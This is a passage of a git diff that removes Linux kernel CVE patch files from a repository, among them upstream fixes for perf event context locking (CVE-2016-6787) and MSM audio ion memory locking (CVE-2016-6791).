-+	return ret;
-+}
- EXPORT_SYMBOL_GPL(perf_event_refresh);
- 
- static void ctx_sched_out(struct perf_event_context *ctx,
-@@ -3433,7 +3544,16 @@ static void perf_remove_from_owner(struct perf_event *event)
- 	rcu_read_unlock();
- 
- 	if (owner) {
--		mutex_lock(&owner->perf_event_mutex);
-+		/*
-+		 * If we're here through perf_event_exit_task() we're already
-+		 * holding ctx->mutex which would be an inversion wrt. the
-+		 * normal lock order.
-+		 *
-+		 * However we can safely take this lock because its the child
-+		 * ctx->mutex.
-+		 */
-+		mutex_lock_nested(&owner->perf_event_mutex, SINGLE_DEPTH_NESTING);
-+
- 		/*
- 		 * We have to re-check the event->owner field, if it is cleared
- 		 * we raced with perf_event_exit_task(), acquiring the mutex
-@@ -3559,12 +3679,13 @@ static int perf_event_read_group(struct perf_event *event,
- 				   u64 read_format, char __user *buf)
- {
- 	struct perf_event *leader = event->group_leader, *sub;
--	int n = 0, size = 0, ret = -EFAULT;
- 	struct perf_event_context *ctx = leader->ctx;
--	u64 values[5];
-+	int n = 0, size = 0, ret;
- 	u64 count, enabled, running;
-+	u64 values[5];
-+
-+	lockdep_assert_held(&ctx->mutex);
- 
--	mutex_lock(&ctx->mutex);
- 	count = perf_event_read_value(leader, &enabled, &running);
- 
- 	values[n++] = 1 + leader->nr_siblings;
-@@ -3579,7 +3700,7 @@ static int perf_event_read_group(struct perf_event *event,
- 	size = n * sizeof(u64);
- 
- 	if (copy_to_user(buf, values, size))
--		goto unlock;
-+		return -EFAULT;
- 
- 	ret = size;
- 
-@@ -3593,14 +3714,11 @@ static int perf_event_read_group(struct perf_event *event,
- 		size = n * sizeof(u64);
- 
- 		if (copy_to_user(buf + ret, values, size)) {
--			ret = -EFAULT;
--			goto unlock;
-+			return -EFAULT;
- 		}
- 
- 		ret += size;
- 	}
--unlock:
--	mutex_unlock(&ctx->mutex);
- 
- 	return ret;
- }
-@@ -3672,8 +3790,14 @@ static ssize_t
- perf_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
- {
- 	struct perf_event *event = file->private_data;
-+	struct perf_event_context *ctx;
-+	int ret;
- 
--	return perf_read_hw(event, buf, count);
-+	ctx = perf_event_ctx_lock(event);
-+	ret = perf_read_hw(event, buf, count);
-+	perf_event_ctx_unlock(event, ctx);
-+
-+	return ret;
- }
- 
- static unsigned int perf_poll(struct file *file, poll_table *wait)
-@@ -3699,7 +3823,7 @@ static unsigned int perf_poll(struct file *file, poll_table *wait)
- 	return events;
- }
- 
--static void perf_event_reset(struct perf_event *event)
-+static void _perf_event_reset(struct perf_event *event)
- {
- 	(void)perf_event_read(event);
- 	local64_set(&event->count, 0);
-@@ -3718,6 +3842,7 @@ static void perf_event_for_each_child(struct perf_event *event,
- 	struct perf_event *child;
- 
- 	WARN_ON_ONCE(event->ctx->parent_ctx);
-+
- 	mutex_lock(&event->child_mutex);
- 	func(event);
- 	list_for_each_entry(child, &event->child_list, child_list)
-@@ -3731,14 +3856,13 @@ static void perf_event_for_each(struct perf_event *event,
- 	struct perf_event_context *ctx = event->ctx;
- 	struct perf_event *sibling;
- 
--	WARN_ON_ONCE(ctx->parent_ctx);
--	mutex_lock(&ctx->mutex);
-+	lockdep_assert_held(&ctx->mutex);
-+
- 	event = event->group_leader;
- 
- 	perf_event_for_each_child(event, func);
- 	list_for_each_entry(sibling, &event->sibling_list, group_entry)
- 		perf_event_for_each_child(sibling, func);
--	mutex_unlock(&ctx->mutex);
- }
- 
- static int perf_event_period(struct perf_event *event, u64 __user *arg)
-@@ -3808,25 +3932,24 @@ static int perf_event_set_output(struct perf_event *event,
- 				 struct perf_event *output_event);
- static int perf_event_set_filter(struct perf_event *event, void __user *arg);
- 
--static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long _perf_ioctl(struct perf_event *event, unsigned int cmd, unsigned long arg)
- {
--	struct perf_event *event = file->private_data;
- 	void (*func)(struct perf_event *);
- 	u32 flags = arg;
- 
- 	switch (cmd) {
- 	case PERF_EVENT_IOC_ENABLE:
--		func = perf_event_enable;
-+		func = _perf_event_enable;
- 		break;
- 	case PERF_EVENT_IOC_DISABLE:
--		func = perf_event_disable;
-+		func = _perf_event_disable;
- 		break;
- 	case PERF_EVENT_IOC_RESET:
--		func = perf_event_reset;
-+		func = _perf_event_reset;
- 		break;
- 
- 	case PERF_EVENT_IOC_REFRESH:
--		return perf_event_refresh(event, arg);
-+		return _perf_event_refresh(event, arg);
- 
- 	case PERF_EVENT_IOC_PERIOD:
- 		return perf_event_period(event, (u64 __user *)arg);
-@@ -3873,6 +3996,19 @@ static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 	return 0;
- }
- 
-+static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+	struct perf_event *event = file->private_data;
-+	struct perf_event_context *ctx;
-+	long ret;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	ret = _perf_ioctl(event, cmd, arg);
-+	perf_event_ctx_unlock(event, ctx);
-+
-+	return ret;
-+}
-+
- #ifdef CONFIG_COMPAT
- static long perf_compat_ioctl(struct file *file, unsigned int cmd,
- 				unsigned long arg)
-@@ -3895,11 +4031,15 @@ static long perf_compat_ioctl(struct file *file, unsigned int cmd,
- 
- int perf_event_task_enable(void)
- {
-+	struct perf_event_context *ctx;
- 	struct perf_event *event;
- 
- 	mutex_lock(&current->perf_event_mutex);
--	list_for_each_entry(event, &current->perf_event_list, owner_entry)
--		perf_event_for_each_child(event, perf_event_enable);
-+	list_for_each_entry(event, &current->perf_event_list, owner_entry) {
-+		ctx = perf_event_ctx_lock(event);
-+		perf_event_for_each_child(event, _perf_event_enable);
-+		perf_event_ctx_unlock(event, ctx);
-+	}
- 	mutex_unlock(&current->perf_event_mutex);
- 
- 	return 0;
-@@ -3907,11 +4047,15 @@ int perf_event_task_enable(void)
- 
- int perf_event_task_disable(void)
- {
-+	struct perf_event_context *ctx;
- 	struct perf_event *event;
- 
- 	mutex_lock(&current->perf_event_mutex);
--	list_for_each_entry(event, &current->perf_event_list, owner_entry)
--		perf_event_for_each_child(event, perf_event_disable);
-+	list_for_each_entry(event, &current->perf_event_list, owner_entry) {
-+		ctx = perf_event_ctx_lock(event);
-+		perf_event_for_each_child(event, _perf_event_disable);
-+		perf_event_ctx_unlock(event, ctx);
-+	}
- 	mutex_unlock(&current->perf_event_mutex);
- 
- 	return 0;
-@@ -7269,6 +7413,15 @@ out:
- 	return ret;
- }
- 
-+static void mutex_lock_double(struct mutex *a, struct mutex *b)
-+{
-+	if (b < a)
-+		swap(a, b);
-+
-+	mutex_lock(a);
-+	mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
-+}
-+
- /**
-  * sys_perf_event_open - open a performance event, associate it to a task/cpu
-  *
-@@ -7284,7 +7437,7 @@ SYSCALL_DEFINE5(perf_event_open,
- 	struct perf_event *group_leader = NULL, *output_event = NULL;
- 	struct perf_event *event, *sibling;
- 	struct perf_event_attr attr;
--	struct perf_event_context *ctx;
-+	struct perf_event_context *ctx, *uninitialized_var(gctx);
- 	struct file *event_file = NULL;
- 	struct fd group = {NULL, 0};
- 	struct task_struct *task = NULL;
-@@ -7482,9 +7635,14 @@ SYSCALL_DEFINE5(perf_event_open,
- 	}
- 
- 	if (move_group) {
--		struct perf_event_context *gctx = group_leader->ctx;
-+		gctx = group_leader->ctx;
-+
-+		/*
-+		 * See perf_event_ctx_lock() for comments on the details
-+		 * of swizzling perf_event::ctx.
-+		 */
-+		mutex_lock_double(&gctx->mutex, &ctx->mutex);
- 
--		mutex_lock(&gctx->mutex);
- 		perf_remove_from_context(group_leader, false);
- 
- 		/*
-@@ -7499,15 +7657,19 @@ SYSCALL_DEFINE5(perf_event_open,
- 			perf_event__state_init(sibling);
- 			put_ctx(gctx);
- 		}
--		mutex_unlock(&gctx->mutex);
--		put_ctx(gctx);
-+	} else {
-+		mutex_lock(&ctx->mutex);
- 	}
- 
- 	WARN_ON_ONCE(ctx->parent_ctx);
--	mutex_lock(&ctx->mutex);
- 
- 	if (move_group) {
-+		/*
-+		 * Wait for everybody to stop referencing the events through
-+		 * the old lists, before installing it on new lists.
-+		 */
- 		synchronize_rcu();
-+
- 		perf_install_in_context(ctx, group_leader, group_leader->cpu);
- 		get_ctx(ctx);
- 		list_for_each_entry(sibling, &group_leader->sibling_list,
-@@ -7519,6 +7681,11 @@ SYSCALL_DEFINE5(perf_event_open,
- 
- 	perf_install_in_context(ctx, event, event->cpu);
- 	perf_unpin_context(ctx);
-+
-+	if (move_group) {
-+		mutex_unlock(&gctx->mutex);
-+		put_ctx(gctx);
-+	}
- 	mutex_unlock(&ctx->mutex);
- 
- 	put_online_cpus();
-@@ -7626,7 +7793,11 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- 	src_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, src_cpu)->ctx;
- 	dst_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, dst_cpu)->ctx;
- 
--	mutex_lock(&src_ctx->mutex);
-+	/*
-+	 * See perf_event_ctx_lock() for comments on the details
-+	 * of swizzling perf_event::ctx.
-+	 */
-+	mutex_lock_double(&src_ctx->mutex, &dst_ctx->mutex);
- 	list_for_each_entry_safe(event, tmp, &src_ctx->event_list,
- 				 event_entry) {
- 		perf_remove_from_context(event, false);
-@@ -7634,11 +7805,9 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- 		put_ctx(src_ctx);
- 		list_add(&event->migrate_entry, &events);
- 	}
--	mutex_unlock(&src_ctx->mutex);
- 
- 	synchronize_rcu();
- 
--	mutex_lock(&dst_ctx->mutex);
- 	list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
- 		list_del(&event->migrate_entry);
- 		if (event->state >= PERF_EVENT_STATE_OFF)
-@@ -7648,6 +7817,7 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- 		get_ctx(dst_ctx);
- 	}
- 	mutex_unlock(&dst_ctx->mutex);
-+	mutex_unlock(&src_ctx->mutex);
- }
- EXPORT_SYMBOL_GPL(perf_pmu_migrate_context);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6787/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6787/ANY/0001.patch
deleted file mode 100644
index 280b6064..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6787/ANY/0001.patch
+++ /dev/null
@@ -1,505 +0,0 @@
-From f63a8daa5812afef4f06c962351687e1ff9ccb2b Mon Sep 17 00:00:00 2001
-From: Peter Zijlstra <peterz@infradead.org>
-Date: Fri, 23 Jan 2015 12:24:14 +0100
-Subject: perf: Fix event->ctx locking
-
-There have been a few reported issues wrt. the lack of locking around
-changing event->ctx. This patch tries to address those.
-
-It avoids the whole rwsem thing; and while it appears to work, please
-give it some thought in review.
-
-What I did fail at is sensible runtime checks on the use of
-event->ctx, the RCU use makes it very hard.
-
-Signed-off-by: Peter Zijlstra (Intel) <peterz@infradead.org>
-Cc: Paul E. McKenney <paulmck@linux.vnet.ibm.com>
-Cc: Jiri Olsa <jolsa@redhat.com>
-Cc: Arnaldo Carvalho de Melo <acme@kernel.org>
-Cc: Linus Torvalds <torvalds@linux-foundation.org>
-Link: http://lkml.kernel.org/r/20150123125834.209535886@infradead.org
-Signed-off-by: Ingo Molnar <mingo@kernel.org>
----
- kernel/events/core.c | 244 +++++++++++++++++++++++++++++++++++++++++++--------
- 1 file changed, 207 insertions(+), 37 deletions(-)
-
-diff --git a/kernel/events/core.c b/kernel/events/core.c
-index b358cb3..417a96b 100644
---- a/kernel/events/core.c
-+++ b/kernel/events/core.c
-@@ -907,6 +907,77 @@ static void put_ctx(struct perf_event_context *ctx)
- }
- 
- /*
-+ * Because of perf_event::ctx migration in sys_perf_event_open::move_group and
-+ * perf_pmu_migrate_context() we need some magic.
-+ *
-+ * Those places that change perf_event::ctx will hold both
-+ * perf_event_ctx::mutex of the 'old' and 'new' ctx value.
-+ *
-+ * Lock ordering is by mutex address. There is one other site where
-+ * perf_event_context::mutex nests and that is put_event(). But remember that
-+ * that is a parent<->child context relation, and migration does not affect
-+ * children, therefore these two orderings should not interact.
-+ *
-+ * The change in perf_event::ctx does not affect children (as claimed above)
-+ * because the sys_perf_event_open() case will install a new event and break
-+ * the ctx parent<->child relation, and perf_pmu_migrate_context() is only
-+ * concerned with cpuctx and that doesn't have children.
-+ *
-+ * The places that change perf_event::ctx will issue:
-+ *
-+ *   perf_remove_from_context();
-+ *   synchronize_rcu();
-+ *   perf_install_in_context();
-+ *
-+ * to affect the change. The remove_from_context() + synchronize_rcu() should
-+ * quiesce the event, after which we can install it in the new location. This
-+ * means that only external vectors (perf_fops, prctl) can perturb the event
-+ * while in transit. Therefore all such accessors should also acquire
-+ * perf_event_context::mutex to serialize against this.
-+ *
-+ * However; because event->ctx can change while we're waiting to acquire
-+ * ctx->mutex we must be careful and use the below perf_event_ctx_lock()
-+ * function.
-+ *
-+ * Lock order:
-+ *	task_struct::perf_event_mutex
-+ *	  perf_event_context::mutex
-+ *	    perf_event_context::lock
-+ *	    perf_event::child_mutex;
-+ *	    perf_event::mmap_mutex
-+ *	    mmap_sem
-+ */
-+static struct perf_event_context *perf_event_ctx_lock(struct perf_event *event)
-+{
-+	struct perf_event_context *ctx;
-+
-+again:
-+	rcu_read_lock();
-+	ctx = ACCESS_ONCE(event->ctx);
-+	if (!atomic_inc_not_zero(&ctx->refcount)) {
-+		rcu_read_unlock();
-+		goto again;
-+	}
-+	rcu_read_unlock();
-+
-+	mutex_lock(&ctx->mutex);
-+	if (event->ctx != ctx) {
-+		mutex_unlock(&ctx->mutex);
-+		put_ctx(ctx);
-+		goto again;
-+	}
-+
-+	return ctx;
-+}
-+
-+static void perf_event_ctx_unlock(struct perf_event *event,
-+				  struct perf_event_context *ctx)
-+{
-+	mutex_unlock(&ctx->mutex);
-+	put_ctx(ctx);
-+}
-+
-+/*
-  * This must be done under the ctx->lock, such as to serialize against
-  * context_equiv(), therefore we cannot call put_ctx() since that might end up
-  * calling scheduler related locks and ctx->lock nests inside those.
-@@ -1666,7 +1737,7 @@ int __perf_event_disable(void *info)
-  * is the current context on this CPU and preemption is disabled,
-  * hence we can't get into perf_event_task_sched_out for this context.
-  */
--void perf_event_disable(struct perf_event *event)
-+static void _perf_event_disable(struct perf_event *event)
- {
- 	struct perf_event_context *ctx = event->ctx;
- 	struct task_struct *task = ctx->task;
-@@ -1707,6 +1778,19 @@ retry:
- 	}
- 	raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * Strictly speaking kernel users cannot create groups and therefore this
-+ * interface does not need the perf_event_ctx_lock() magic.
-+ */
-+void perf_event_disable(struct perf_event *event)
-+{
-+	struct perf_event_context *ctx;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	_perf_event_disable(event);
-+	perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_disable);
- 
- static void perf_set_shadow_time(struct perf_event *event,
-@@ -2170,7 +2254,7 @@ unlock:
-  * perf_event_for_each_child or perf_event_for_each as described
-  * for perf_event_disable.
-  */
--void perf_event_enable(struct perf_event *event)
-+static void _perf_event_enable(struct perf_event *event)
- {
- 	struct perf_event_context *ctx = event->ctx;
- 	struct task_struct *task = ctx->task;
-@@ -2226,9 +2310,21 @@ retry:
- out:
- 	raw_spin_unlock_irq(&ctx->lock);
- }
-+
-+/*
-+ * See perf_event_disable();
-+ */
-+void perf_event_enable(struct perf_event *event)
-+{
-+	struct perf_event_context *ctx;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	_perf_event_enable(event);
-+	perf_event_ctx_unlock(event, ctx);
-+}
- EXPORT_SYMBOL_GPL(perf_event_enable);
- 
--int perf_event_refresh(struct perf_event *event, int refresh)
-+static int _perf_event_refresh(struct perf_event *event, int refresh)
- {
- 	/*
- 	 * not supported on inherited events
-@@ -2237,10 +2333,25 @@ int perf_event_refresh(struct perf_event *event, int refresh)
- 		return -EINVAL;
- 
- 	atomic_add(refresh, &event->event_limit);
--	perf_event_enable(event);
-+	_perf_event_enable(event);
- 
- 	return 0;
- }
-+
-+/*
-+ * See perf_event_disable()
-+ */
-+int perf_event_refresh(struct perf_event *event, int refresh)
-+{
-+	struct perf_event_context *ctx;
-+	int ret;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	ret = _perf_event_refresh(event, refresh);
-+	perf_event_ctx_unlock(event, ctx);
-+
-+	return ret;
-+}
- EXPORT_SYMBOL_GPL(perf_event_refresh);
- 
- static void ctx_sched_out(struct perf_event_context *ctx,
-@@ -3433,7 +3544,16 @@ static void perf_remove_from_owner(struct perf_event *event)
- 	rcu_read_unlock();
- 
- 	if (owner) {
--		mutex_lock(&owner->perf_event_mutex);
-+		/*
-+		 * If we're here through perf_event_exit_task() we're already
-+		 * holding ctx->mutex which would be an inversion wrt. the
-+		 * normal lock order.
-+		 *
-+		 * However we can safely take this lock because its the child
-+		 * ctx->mutex.
-+		 */
-+		mutex_lock_nested(&owner->perf_event_mutex, SINGLE_DEPTH_NESTING);
-+
- 		/*
- 		 * We have to re-check the event->owner field, if it is cleared
- 		 * we raced with perf_event_exit_task(), acquiring the mutex
-@@ -3559,12 +3679,13 @@ static int perf_event_read_group(struct perf_event *event,
- 				   u64 read_format, char __user *buf)
- {
- 	struct perf_event *leader = event->group_leader, *sub;
--	int n = 0, size = 0, ret = -EFAULT;
- 	struct perf_event_context *ctx = leader->ctx;
--	u64 values[5];
-+	int n = 0, size = 0, ret;
- 	u64 count, enabled, running;
-+	u64 values[5];
-+
-+	lockdep_assert_held(&ctx->mutex);
- 
--	mutex_lock(&ctx->mutex);
- 	count = perf_event_read_value(leader, &enabled, &running);
- 
- 	values[n++] = 1 + leader->nr_siblings;
-@@ -3579,7 +3700,7 @@ static int perf_event_read_group(struct perf_event *event,
- 	size = n * sizeof(u64);
- 
- 	if (copy_to_user(buf, values, size))
--		goto unlock;
-+		return -EFAULT;
- 
- 	ret = size;
- 
-@@ -3593,14 +3714,11 @@ static int perf_event_read_group(struct perf_event *event,
- 		size = n * sizeof(u64);
- 
- 		if (copy_to_user(buf + ret, values, size)) {
--			ret = -EFAULT;
--			goto unlock;
-+			return -EFAULT;
- 		}
- 
- 		ret += size;
- 	}
--unlock:
--	mutex_unlock(&ctx->mutex);
- 
- 	return ret;
- }
-@@ -3672,8 +3790,14 @@ static ssize_t
- perf_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
- {
- 	struct perf_event *event = file->private_data;
-+	struct perf_event_context *ctx;
-+	int ret;
- 
--	return perf_read_hw(event, buf, count);
-+	ctx = perf_event_ctx_lock(event);
-+	ret = perf_read_hw(event, buf, count);
-+	perf_event_ctx_unlock(event, ctx);
-+
-+	return ret;
- }
- 
- static unsigned int perf_poll(struct file *file, poll_table *wait)
-@@ -3699,7 +3823,7 @@ static unsigned int perf_poll(struct file *file, poll_table *wait)
- 	return events;
- }
- 
--static void perf_event_reset(struct perf_event *event)
-+static void _perf_event_reset(struct perf_event *event)
- {
- 	(void)perf_event_read(event);
- 	local64_set(&event->count, 0);
-@@ -3718,6 +3842,7 @@ static void perf_event_for_each_child(struct perf_event *event,
- 	struct perf_event *child;
- 
- 	WARN_ON_ONCE(event->ctx->parent_ctx);
-+
- 	mutex_lock(&event->child_mutex);
- 	func(event);
- 	list_for_each_entry(child, &event->child_list, child_list)
-@@ -3731,14 +3856,13 @@ static void perf_event_for_each(struct perf_event *event,
- 	struct perf_event_context *ctx = event->ctx;
- 	struct perf_event *sibling;
- 
--	WARN_ON_ONCE(ctx->parent_ctx);
--	mutex_lock(&ctx->mutex);
-+	lockdep_assert_held(&ctx->mutex);
-+
- 	event = event->group_leader;
- 
- 	perf_event_for_each_child(event, func);
- 	list_for_each_entry(sibling, &event->sibling_list, group_entry)
- 		perf_event_for_each_child(sibling, func);
--	mutex_unlock(&ctx->mutex);
- }
- 
- static int perf_event_period(struct perf_event *event, u64 __user *arg)
-@@ -3808,25 +3932,24 @@ static int perf_event_set_output(struct perf_event *event,
- 				 struct perf_event *output_event);
- static int perf_event_set_filter(struct perf_event *event, void __user *arg);
- 
--static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+static long _perf_ioctl(struct perf_event *event, unsigned int cmd, unsigned long arg)
- {
--	struct perf_event *event = file->private_data;
- 	void (*func)(struct perf_event *);
- 	u32 flags = arg;
- 
- 	switch (cmd) {
- 	case PERF_EVENT_IOC_ENABLE:
--		func = perf_event_enable;
-+		func = _perf_event_enable;
- 		break;
- 	case PERF_EVENT_IOC_DISABLE:
--		func = perf_event_disable;
-+		func = _perf_event_disable;
- 		break;
- 	case PERF_EVENT_IOC_RESET:
--		func = perf_event_reset;
-+		func = _perf_event_reset;
- 		break;
- 
- 	case PERF_EVENT_IOC_REFRESH:
--		return perf_event_refresh(event, arg);
-+		return _perf_event_refresh(event, arg);
- 
- 	case PERF_EVENT_IOC_PERIOD:
- 		return perf_event_period(event, (u64 __user *)arg);
-@@ -3873,6 +3996,19 @@ static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 	return 0;
- }
- 
-+static long perf_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
-+{
-+	struct perf_event *event = file->private_data;
-+	struct perf_event_context *ctx;
-+	long ret;
-+
-+	ctx = perf_event_ctx_lock(event);
-+	ret = _perf_ioctl(event, cmd, arg);
-+	perf_event_ctx_unlock(event, ctx);
-+
-+	return ret;
-+}
-+
- #ifdef CONFIG_COMPAT
- static long perf_compat_ioctl(struct file *file, unsigned int cmd,
- 				unsigned long arg)
-@@ -3895,11 +4031,15 @@ static long perf_compat_ioctl(struct file *file, unsigned int cmd,
- 
- int perf_event_task_enable(void)
- {
-+	struct perf_event_context *ctx;
- 	struct perf_event *event;
- 
- 	mutex_lock(&current->perf_event_mutex);
--	list_for_each_entry(event, &current->perf_event_list, owner_entry)
--		perf_event_for_each_child(event, perf_event_enable);
-+	list_for_each_entry(event, &current->perf_event_list, owner_entry) {
-+		ctx = perf_event_ctx_lock(event);
-+		perf_event_for_each_child(event, _perf_event_enable);
-+		perf_event_ctx_unlock(event, ctx);
-+	}
- 	mutex_unlock(&current->perf_event_mutex);
- 
- 	return 0;
-@@ -3907,11 +4047,15 @@ int perf_event_task_enable(void)
- 
- int perf_event_task_disable(void)
- {
-+	struct perf_event_context *ctx;
- 	struct perf_event *event;
- 
- 	mutex_lock(&current->perf_event_mutex);
--	list_for_each_entry(event, &current->perf_event_list, owner_entry)
--		perf_event_for_each_child(event, perf_event_disable);
-+	list_for_each_entry(event, &current->perf_event_list, owner_entry) {
-+		ctx = perf_event_ctx_lock(event);
-+		perf_event_for_each_child(event, _perf_event_disable);
-+		perf_event_ctx_unlock(event, ctx);
-+	}
- 	mutex_unlock(&current->perf_event_mutex);
- 
- 	return 0;
-@@ -7269,6 +7413,15 @@ out:
- 	return ret;
- }
- 
-+static void mutex_lock_double(struct mutex *a, struct mutex *b)
-+{
-+	if (b < a)
-+		swap(a, b);
-+
-+	mutex_lock(a);
-+	mutex_lock_nested(b, SINGLE_DEPTH_NESTING);
-+}
-+
- /**
-  * sys_perf_event_open - open a performance event, associate it to a task/cpu
-  *
-@@ -7284,7 +7437,7 @@ SYSCALL_DEFINE5(perf_event_open,
- 	struct perf_event *group_leader = NULL, *output_event = NULL;
- 	struct perf_event *event, *sibling;
- 	struct perf_event_attr attr;
--	struct perf_event_context *ctx;
-+	struct perf_event_context *ctx, *uninitialized_var(gctx);
- 	struct file *event_file = NULL;
- 	struct fd group = {NULL, 0};
- 	struct task_struct *task = NULL;
-@@ -7482,9 +7635,14 @@ SYSCALL_DEFINE5(perf_event_open,
- 	}
- 
- 	if (move_group) {
--		struct perf_event_context *gctx = group_leader->ctx;
-+		gctx = group_leader->ctx;
-+
-+		/*
-+		 * See perf_event_ctx_lock() for comments on the details
-+		 * of swizzling perf_event::ctx.
-+		 */
-+		mutex_lock_double(&gctx->mutex, &ctx->mutex);
- 
--		mutex_lock(&gctx->mutex);
- 		perf_remove_from_context(group_leader, false);
- 
- 		/*
-@@ -7499,15 +7657,19 @@ SYSCALL_DEFINE5(perf_event_open,
- 			perf_event__state_init(sibling);
- 			put_ctx(gctx);
- 		}
--		mutex_unlock(&gctx->mutex);
--		put_ctx(gctx);
-+	} else {
-+		mutex_lock(&ctx->mutex);
- 	}
- 
- 	WARN_ON_ONCE(ctx->parent_ctx);
--	mutex_lock(&ctx->mutex);
- 
- 	if (move_group) {
-+		/*
-+		 * Wait for everybody to stop referencing the events through
-+		 * the old lists, before installing it on new lists.
-+		 */
- 		synchronize_rcu();
-+
- 		perf_install_in_context(ctx, group_leader, group_leader->cpu);
- 		get_ctx(ctx);
- 		list_for_each_entry(sibling, &group_leader->sibling_list,
-@@ -7519,6 +7681,11 @@ SYSCALL_DEFINE5(perf_event_open,
- 
- 	perf_install_in_context(ctx, event, event->cpu);
- 	perf_unpin_context(ctx);
-+
-+	if (move_group) {
-+		mutex_unlock(&gctx->mutex);
-+		put_ctx(gctx);
-+	}
- 	mutex_unlock(&ctx->mutex);
- 
- 	put_online_cpus();
-@@ -7626,7 +7793,11 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- 	src_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, src_cpu)->ctx;
- 	dst_ctx = &per_cpu_ptr(pmu->pmu_cpu_context, dst_cpu)->ctx;
- 
--	mutex_lock(&src_ctx->mutex);
-+	/*
-+	 * See perf_event_ctx_lock() for comments on the details
-+	 * of swizzling perf_event::ctx.
-+	 */
-+	mutex_lock_double(&src_ctx->mutex, &dst_ctx->mutex);
- 	list_for_each_entry_safe(event, tmp, &src_ctx->event_list,
- 				 event_entry) {
- 		perf_remove_from_context(event, false);
-@@ -7634,11 +7805,9 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- 		put_ctx(src_ctx);
- 		list_add(&event->migrate_entry, &events);
- 	}
--	mutex_unlock(&src_ctx->mutex);
- 
- 	synchronize_rcu();
- 
--	mutex_lock(&dst_ctx->mutex);
- 	list_for_each_entry_safe(event, tmp, &events, migrate_entry) {
- 		list_del(&event->migrate_entry);
- 		if (event->state >= PERF_EVENT_STATE_OFF)
-@@ -7648,6 +7817,7 @@ void perf_pmu_migrate_context(struct pmu *pmu, int src_cpu, int dst_cpu)
- 		get_ctx(dst_ctx);
- 	}
- 	mutex_unlock(&dst_ctx->mutex);
-+	mutex_unlock(&src_ctx->mutex);
- }
- EXPORT_SYMBOL_GPL(perf_pmu_migrate_context);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6791/ANY/0001.patch
deleted file mode 100644
index 5db9e5c2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6791/ANY/0001.patch
+++ /dev/null
@@ -1,79 +0,0 @@
-From 30a4f0783d2978e27a8b8856d8e358ccaf5ddab4 Mon Sep 17 00:00:00 2001
-From: Walter Yang <yandongy@codeaurora.org>
-Date: Thu, 13 Oct 2016 10:48:39 +0800
-Subject: ASoC: msm: lock read/write when add/free audio ion memory
-
-As read/write get access to ion memory region as well, it's
-necessary to lock them when ion memory is about to be added/freed
-to avoid racing cases.
-
-CRs-Fixed: 1071809
-Change-Id: I436ead23c93384961b38ca99b9312a40c50ad03a
-Signed-off-by: Walter Yang <yandongy@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c | 20 +++++++++++++++++---
- 1 file changed, 17 insertions(+), 3 deletions(-)
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-index 5bdd10a..4455368 100644
---- a/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-+++ b/arch/arm/mach-msm/qdsp6v2/audio_utils_aio.c
-@@ -1,6 +1,6 @@
- /* Copyright (C) 2008 Google, Inc.
-  * Copyright (C) 2008 HTC Corporation
-- * Copyright (c) 2009-2013, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2009-2013,2016 The Linux Foundation. All rights reserved.
-  *
-  * This software is licensed under the terms of the GNU General Public
-  * License version 2, as published by the Free Software Foundation, and
-@@ -562,6 +562,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	struct q6audio_aio *audio = file->private_data;
- 	pr_debug("%s[%p]\n", __func__, audio);
- 	mutex_lock(&audio->lock);
-+	mutex_lock(&audio->read_lock);
-+	mutex_lock(&audio->write_lock);
- 	audio->wflush = 1;
- 	if (audio->enabled)
- 		audio_aio_flush(audio);
-@@ -577,6 +579,8 @@ int audio_aio_release(struct inode *inode, struct file *file)
- 	audio_aio_reset_event_queue(audio);
- 	q6asm_audio_client_free(audio->ac);
- 	mutex_unlock(&audio->lock);
-+	mutex_unlock(&audio->write_lock);
-+	mutex_unlock(&audio->read_lock);
- 	mutex_destroy(&audio->lock);
- 	mutex_destroy(&audio->read_lock);
- 	mutex_destroy(&audio->write_lock);
-@@ -1349,8 +1353,13 @@ long audio_aio_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
- 		mutex_lock(&audio->lock);
- 		if (copy_from_user(&info, (void *)arg, sizeof(info)))
- 			rc = -EFAULT;
--		else
-+		else{
-+			mutex_lock(&audio->read_lock);
-+			mutex_lock(&audio->write_lock);
- 			rc = audio_aio_ion_add(audio, &info);
-+			mutex_unlock(&audio->write_lock);
-+			mutex_unlock(&audio->read_lock);
-+		}
- 		mutex_unlock(&audio->lock);
- 		break;
- 	}
